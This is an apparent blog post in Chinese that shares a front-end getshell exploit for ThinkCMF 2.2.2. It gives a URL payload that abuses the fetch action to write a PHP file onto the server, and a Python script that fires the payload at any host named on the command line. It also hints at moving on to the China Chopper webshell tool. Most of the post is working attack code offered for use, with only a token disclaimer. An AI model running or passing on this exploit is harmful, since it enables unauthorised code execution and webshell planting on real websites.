ThinkCMF 2.2.2 前台getshell+EXP

Admin 2020-05-02 232人围观 ,发现0个评论 ThinkCMF前台getshell

本文章的EXP及其环境是朋友woojay给的 只是分享 请勿非法使用

ThinkCMF我没有玩过,前几天,woojay问我玩过没 我说没有 给我了一个python写的脚本 

这个python脚本的环境要:python3

ThinkCMF 2.2.2 前台getshell+EXP Web安全 第1张

然后EXP:

/index.php?a=fetch&templateFile=public/index&prefix=%27%27&content=<php>file_put_contents(%27yir6.php%27,%27<?php%20phpinfo();%20?>%27)</php>

ThinkCMF 2.2.2 前台getshell+EXP Web安全 第2张

这里我们写入的文件就是yir6.php也就是shell 

我们询问这个yir6.php这个文件 就是phpinfo文件 其他的 应该知道怎么做了吗? 直接上中国菜刀

下面就不敢搞了 


ThinkCMF 2.2.2 前台getshell+EXP Web安全 第3张

附上python脚本:

#ThinkCMF 2.2.2 前台getshell
#author woojay
#/index.php?a=display&templateFile=README.md file include
import sys
import requests
payload = "/index.php?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('yir6.php','<?php phpinfo(); ?>')</php>"
filename = ""
host = ""
if len(sys.argv) < 3:
print("Example: python3 x.py http://www.yir6.cn shell.php")
exit()
else:
if host.endswith("/"):
host = sys.argv[:-1]
else:
host = sys.argv[1]
filename = sys.argv[2]
payload = payload.replace("yir6.php",filename)
res = requests.get(host+payload)
if res.status_code == 200:
print("[+] OK")
print("[+] " + host + "/" + filename)
else:
print("[-] Failed")


请发表您的评论
请关注微信公众号
微信二维码
不容错过
Powered By 蚁人博客